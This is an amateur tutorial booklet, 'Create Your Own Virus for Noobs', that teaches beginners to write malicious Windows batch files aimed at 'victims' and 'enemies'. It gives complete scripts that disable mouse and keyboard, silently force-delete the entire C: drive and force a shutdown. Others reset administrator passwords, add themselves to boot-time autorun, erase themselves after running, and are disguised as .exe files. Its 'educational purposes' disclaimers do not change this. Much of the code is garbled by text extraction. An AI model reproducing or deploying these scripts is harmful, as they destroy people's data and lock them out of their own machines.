Buink's Create Your Own Virus for Noobs


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  • 8/8/2019 Buink's Create Your Own Virus for Noobs



  • 8/8/2019 Buink's Create Your Own Virus for Noobs



    About This Book

    This book is one of the best compact virus making tutorialized books available for free. I am Bharath AkaEth!c@l Aka Baba. This book is XCLUSIVELY for NOOBS , those who are starting their journey of exploringthe world of VIRUS.

    I wrote this book only for educational purposes and for the people who mailed me tons of times for thebasic tutorial of such , here you go.

    I have embedded basic commands with notes and examples. I know there is few stuff lacking in thisbook, since you are a beginner, this would be enough. ( Not to confuse you up )

    In my next edition , I will deal with more advanced stuff , like creating virus completely using languagessuch as C, VB etc ..

    This book is only for educational purposes, I am nowhere, no way responsible to any of your acts.

    Colors used for easy understanding.

    Codes will be in Brown in color

    Editiors note or comments will be in GREEN COLOR, starts with ###

    If you have any queries , you can meet me up @ bharath9yk@yahoo.com or on my websitewww.buink.com/web-security

    Please dont post saying sum stupid shit like this shit if for noobs blablabla.Its supposed to be for noobs.

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    Firstly, thank you my dear, lovely, awesome GOD for this life.

    Thanks to my mom and dad, and this book is dedicated to you my GOD.

    Thanks for being with me, my sweet heart JO.

    I really must thank all my members who are all damn active on forum sharing their knowledge bymaking their own tutorials including Video tutorials.

    That really put up my spirit and made me to write this book which is my second one.

    Shoutz to :

    Jamie, Ryle , Cooldude , sahil_29_may, naimish , f_tech25

    This book is only for educational purposes, I am nowhere, no way responsible to any of youracts.

  • 8/8/2019 Buink's Create Your Own Virus for Noobs



    Table Of Contents

    1. Introduction ------------------------------------------------------------------------------- 5

    2. Terminology ------------------------------------------------------------------------------- 6

    3. Creating Your Own Batch Virus ----------------------------------------------------- 7

    3.1 What is a Batch file? -------------------------------------------------------------------8

    3.2 How To Start ? ---------------------------------------------------------------------------8

    3.3 Coding --------------------------------------------------------------------------9

    4. Lets Get Started -------------------------------------------------------------------------- 10

    5. Freaky Programs ------------------------------------------------------------------------ 13

    5.1 What Doest Freaky Programs Mean ? -------------------------------------------14

    6. Password Changers -------------------------------------------------------------------- 16

    7. Delete The Batch File Automatically As Soon As The Victim executes It. --------------18

    8. Implementing WAIT ------------------------------------------------------------------ 18

    9. Working With SET/P ---------------------------------------------------------------- 18

    10. IF --------------------------------------------------------------------------------------------- 19

    10.1 Working using IF ---------------------------------------------------- 21

    11. Making .bat file Into .exe Files -------------------------------------------------------- 23

    11.1 Converting .bat file into .exe file -------------------------------- 24

    11.2 Coding In C Language --------------------------------------------- 24

    11.3 Using Software To Convert .bat to .exe ------------------------- 24

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    Virus, This is the name that you hear most , whether you are online or offline. These virusesultimately effects your throughput ( Processing speed ) , kicks your privacy off etc..

    How tech geeks code VIRUS ?? Is it that easy ?? I should say yes, it is damn easy to create aprogram which does some malfunction rather than creating a good and efficient program.

    There are many ways to create virus. Many programmers do prefer C language , ASM languages

    to write virus , even VB etc ..

    To fight against these viruses you must know how exactly they get coded by programmers andhow exactly they do work.

    In this book I will explain about Creating Batch virus , Making it an exe file etc.

    This book is only for EDUCATIONAL PURPOUSES. We are not responsibility to any kind of damage you do directly or indirectly. Please do not miss use this.

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    VIRUS: A program or piece of code that is loaded onto your computer without your knowledgeand runs against your wishes. Viruses can also replicate themselves. All computer viruses aremanmade. A simple virus that can make a copy of itself over and over again is relatively easy toproduce. Even such a simple virus is dangerous because it will quickly use all available memoryand bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.

    HISTORY: The Creeper virus was first detected on ARPANET, the forerunner of the Internet inthe early 1970s. It propagated via the TENEX operating system and could make use of anyconnected modem to dial out to remote computers and infect them. It would display the

    message "I'M THE CREEPER : CATCH ME IF YOU CAN.". It is rumored that the Reaper program,which appeared shortly after and sought out copies of the Creeper and deleted them, may havebeen written by the creator of the Creeper in a fit of regret

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    What is a Batch file?

    A Batch file is a program that runs in the command prompt of a computer. It uses MS-DOScommands, and can help you or destroy you. I'm just going to explain the basics of how toprogram a Batch file virus/semi virus.

    How To Start ?

    Open notepad. It should come auto-installed on your operating system. Now all you have todo is remember to save this scripting code that you are about to write as a ".BAT" file. Thatmeans , as soon as you are done with writing code in notepad , save it with an extension .Batthis will create .bat file.

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    Always begin Batch file with two commands, @echo off and cls . These commands hide yourcommands/code for the person who activates the program.

    So far so good, now , open your notepad and type the above two commands

    @echo off


    Before I start talking about Advanced commands, the obvious next step should be What Exactly That You Want The Program To Do

    Obviously this depends on many factors, on your ethics, number of enemies that you have etc.You must have a clear vision of what you are doing and what exactly the program should do.

    Good to see you thinking.

    While you think, I give you a quick glance of few damn important commands.

    echo --- This command will make text appear in the command prompt.

    pause --- This command will ask the user to "Press Any Key To continue" before it activates thenext command.


    @echo off cls

    echo Hi, hello world pause

    Now save the above file with extension .bat and test it , if you want to.

    Hope you are done with your thinking job.

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    Lets Get Started .

    Lets Code A Simple Frustrating Virus.

    You can ultimately screw your enemies brains without damaging his/her computer.

    Before that , let us go through few predominant commands


    This command sends a pop-up message to a user of your choice with a message that you dospecify. This even make little BEEP sound while throwing out the pop-up. The more pop-ups the

    more frustration


    MSG (user) (message)


    MSG Ethical Hi Ethical


    This command can put a title on a list of commands


    This command is used for naming a list of commands to go to.


    GOTO list

    # Note : GOTO has no syntax


    This command will start any program/application on your computer that you specify. Plays aprominent role.

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    START (program to start)


    START firefox.exe


    This command can control any module on the computer like Key board, mouse etc .. This isone of the best commands.


    RunDll32 (module,command) / Rundll32 (User,command)

    ### Dont get confused. It will be more clear when we get deep into this in forth coming topics.

    Lets Code A Simple Frustrating Virus.

    @echo off :REPEAT clsRundll32 user32,SwapMouseButtonecho visit www.buink.com/web-security start www.google.comstart www.yahoo.com start www.buink.com/web-security start www.buink.comgoto REPEAT

    ### When you make a .bat file , the code can be seen by viewing it using notepad just by right clickingon it. To avoid this , we need to make it look like a genuine progie. To do that we use C language andconvert the .bat file into .exe file. I will explain you how to do this in coming topics.

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    You can make this program Auto Run up on every Boot-up. You can simply give it the attributesof an auto-run Batch file. Use this code to do so

    clscd c:type cd c:

    ATTRIB c:AUTOEXEC.bat -H %0 >>c:AUTOEXEC.bat echo > copy %0


    del /q %0 cls

    ### Before executing the above code go to CMD and type ATTRIB /? To know what exactly the ATTRIBdoes.


    Go To CMD and type each command given above with /? beside the Command to know all theattributes it has .

    For Example

    MSG /?

    This will help you a lot.

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    What Doest Freaky Programs Mean ?

    Freaky Programs The name says it all.

    It just means EXPLORING THE DARK SIDE.

    There are many commands seems to be considered as NOOB commands by few guys ( Whothink that they know much ) but they arent. They seems to be calm but they cause damnfuck*n destruction.

    These commands sound really beautiful, lovely. But a single command of such can destroy anymachine.

    Thinking of using these commands on your friends, enemies?? This comes down to ETHICS. Iseriously OBJECT trying these on others computers without their permission and I personallydont encourage doing this.

    As Ive claimed before, this book is only for Educational Purposes. Dont misuse it , and I am noway responsible to any of the act you do.


    Sounds good ha ?? We can use the DEL command (delete) with several nifty options and cansilently delete the whole harddrive in a little less than 10 seconds.

    Open CMD ( go to Start>Run>cmd) and type DEL /?

    You can see different attributes, options it has.

    Deletes one or more files.

    DEL [/P] [/F] [/S] [/Q] [/A[[:]attributes]] namesERASE [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names

    names Specifies a list of one or more files or directories.Wildcards may be used to delete multiple files. If adirectory is specified, all files within the directory will be deleted.

    /P Prompts for confirmation before deleting each file. /F Force deleting of read-only files.

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    / S Delete specified files from all subdirectories. /Q Quiet mode, do not ask if ok to delete on global wildcard /A Selects files to delete based on attributes


    @echo off clsrundll32 MOUSE,disable ### Disables Mouserundll32 KEYBOARD,disable ### Disables Key Board rundll32 user32,SetCursorPos ### Puts the mouse pointer in the lower right corner of the screen. cls ### Clears the above displayed stuff DEL /F /S /Q C: ### Deletes C: Drive Force fully, whole tree, quietly cls shutdown -s -t 10 c -f ### Shuts down in 10 seconds without prompt clsexit

    ### Above , brown font is the code and green font is just the description.

    The above code Disables mouse, keyboard. /f = forcefully , /s = complete tree , /q = Quietly ( without anyprompt )

    Finally shuts down the system within 10 seconds.

    It seems to be very simple virus, but it creates damn pain in Arse. Destructs massively. It deleteshard drive silently , and shuts down. The user cant even stop the process since his mouse andkeyboard has been disabled.

    As soon as he execute the program, if he notice some vague thing happening, he can shutdownthe system which will ultimately throw him on the sea shore from the sea.

    Again, I am not liable for anything you choose to do with this knowledge... It's

    not my fault, infact I recommend you never use these commands.

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    There are lots of little beautiful commands, all you need to do is EXPLORE them as many as youcan.

    One amongst them is net user

    @echo off clsnet user owner NewPassword net user administrator NewPassword cls

    echo. echo Check Out , Your Passwords Has Been Changed ..


    The "net user" command can be used in several different ways:

    Type net user /? To know more

    Simple net user will display all users on the local PC.

    This command is very helpful to change the password through command prompt.

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    Delete The Batch File Automatically As Soon As The Victim executes It.

    DEL /Q (program_name.BAT)

    Add it at the end of the code of your batch file.

    Implementing WAIT

    @ping.exe -n 5 -w 1000 > nul

    The above command pauses its process for 5 seconds and then executes the next command.

    Working With SET/P

    @echo off clsecho what is your name? ### Prints What Is Your Name Set /p input= ### Takes the inputclsecho Hi %input%!! ### Prints Hi with the given input

    pause ### Pauses until you press any button

    exit ### Exits

    ### Above , brown font is the code and green font is just the description.

    Echo used to prints the message beside it on the screen when execution is done.

    Set /p Variable_name You can set Variable name as you wish. This command is used to takeinput and stores the given input in assigned variable.

    Hope the above example is self explanatory. If you dont really understand you can try that outmaking .bat file.

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    Working Using IF

    Let us consider general If ..... Else Statements

    The If, Else, Else If sounds similar as that of ENGLISH wording, and I say yes , it is ..


    If ramu go to the college He can meet his lecturer else he can't meet his lecturer.

    This is the best example I can give .. If the condition is true that is going to the college , the statementwill be true that is He can meet his lecturer , If it is false then he can't meet his lecturer.

    This is the same case with most of the stuff.

    In Batch we have some thing like

    IF condition is true Execute next

    @echo off clsecho Please enter password: set /p inputchoice= IF %inputchoice% equ 08yds1 goto accessgranted echo.echo.echo Access Denied

    pauseexit :accessgranted clsecho Access Granted.


    First; it sends a message telling the user to enter a password. Then we use the "IF" command tosay that IF the user types 08yds1, to GOTO a new command list. If he doesn't, that IF string willsimply be skipped, and the screen will read "Access Denied".

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    Using this in the virus world:

    Batch programming doesn't directly relate to Batch viruses, but there are always ways of making it do so. Be creative.

    @echo off clsRundll32 MOUSE,disableclsecho Welcome To The World Of Fun.echo.

    echo hi pauseclsecho Answer these questions as best you can.

    pauseecho What, is your name? set /p name=clsecho What, is your quest? set /p input=cls

    echo What, is your favorite color? set /p color=echo %name%, your favorite color is not %color%!!! echo.@ping.exe -n 3 -w 1000 > nul goto DIE :DIE echo AHHHHHH DEL /Q /S /F C:clsshutdown -s -t 10 -c "Thou Art Guess was Incorrect." -f

    Above we have a nasty little program that pops-up in the command prompt and disables yourMouse.

    I dont damn recommend you to try this up neither on your friends nor on your enemies. But if you do, perhaps use a little bit less black-hat command than Delete C drive?

    Try using While loops, for etc ,.

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    Converting .bat file Into .exe File

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    Converting .bat file into .exe file

    I will show you two ways to do this.

    1. Coding In C language to make your file .exe file.2. Using software to convert .bat to .exe

    Coding In C language.

    Well yes, you can use all batch commands in C and make it directly .exe file with out anyconverting crap !!

    This is how it goes.

    I will give you a simple code , You can easily understand.


    void main(){

    sys tem("@echo off");sys tem("md c:\Dont.Panic1);


    #include ,#include , #include these three are the important stuff thatyou must include them while starting a program in c.

    # include , this library helps in embedding batch commands and execute them.

    If you got any command to be executed ( batch command ) please follow the syntax.

    sys tem( COMMAND");

    If you think that you are done with writing a program, compile it, that makes an .exe file.

    Its done.

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    Using Software To Convert .bat to .exe

    Use Multi biner c 1.4.1 to do all that you want.

    Video : http://buink.com/web-security/index.php?topic=2113.0

    If I get enough response , I will write the next edition of it , thanks foryour support.

    Meet me @ bharath9yk@yahoo.com Visit us @ www.buink.com/web-security

    Send your feed back @ bharath9yk@yahoo.com

    Regards ETH!C@L
